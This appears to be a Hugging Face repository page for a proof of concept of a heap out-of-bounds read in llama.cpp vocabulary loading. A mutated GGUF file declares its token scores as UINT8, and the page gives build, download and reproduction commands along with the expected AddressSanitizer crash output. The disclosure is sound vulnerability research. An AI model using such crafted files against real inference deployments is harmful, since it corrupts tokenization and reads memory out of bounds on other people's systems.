How to use from the
Use from the
llama-cpp-python library
# !pip install llama-cpp-python

from llama_cpp import Llama

llm = Llama.from_pretrained(
	repo_id="VincHmann/gguf-security-poc",
	filename="poc_mutated_real.gguf",
)
output = llm(
	"Once upon a time,",
	max_tokens=512,
	echo=True
)
print(output)

GGUF Vocabulary Loading Heap OOB Read โ€” PoC

Vulnerability

Heap out-of-bounds read in llama.cpp vocabulary loading due to missing GGUF array element-type validation. llama-vocab.cpp casts gguf_get_arr_data() to float* without verifying the stored element type via gguf_get_arr_type(). A GGUF file declaring tokenizer.ggml.scores as GGUF_TYPE_UINT8 (1 byte per element) causes 4-byte reads from a 1-byte-per-element buffer.

The file is accepted by the GGUF parser without error; the OOB read happens later in llama_vocab::impl::load() during llama_model_load_from_file().

Repository contents

File SHA256 Description
poc_mutated_real.gguf 56addd738324fb7b2b21a8a970848d1f59115ea96882e1190b0fc98c60f04787 Mutated from real LLaMA SPM vocab (32000 tokens). Scores array element type changed from FLOAT32 to UINT8, payload truncated to match. All other metadata unchanged.
mutate_real_gguf.py โ€” Script used to create the PoC from the original vocab file.

How to reproduce

1. Clone and build llama.cpp with AddressSanitizer

git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
mkdir build-asan && cd build-asan
cmake .. \
  -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer" \
  -DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer" \
  -DCMAKE_BUILD_TYPE=Debug
cmake --build . -j$(nproc)
cd ..

2. Download PoC and run

huggingface-cli download VincHmann/gguf-security-poc poc_mutated_real.gguf --local-dir .

ASAN_OPTIONS='detect_leaks=0' ./build-asan/bin/llama-tokenize -m poc_mutated_real.gguf --prompt 'test'

Note: --prompt is required by the tool's CLI, but the crash occurs during llama_model_load_from_file() before the prompt is processed.

3. Expected output

==PID==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x...
READ of size 4 at 0x... thread T0
    #0 in llama_vocab::impl::load(...) src/llama-vocab.cpp:2229

0x... is located 0 bytes after 32000-byte region

Tested on

  • llama.cpp commit d0a6dfeb2 (HEAD, 2026-04-06)
  • Ubuntu (WSL2), g++ 13, cmake 3.28
  • AddressSanitizer + UndefinedBehaviorSanitizer

Impact

The heap OOB read (up to 96KB for a 32000-token vocabulary) occurs during the standard llama_model_load_from_file() call. Without ASAN, the corrupted scores silently alter tokenization output.

Downloads last month
11
GGUF
Model size
0 params
Architecture
llama
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support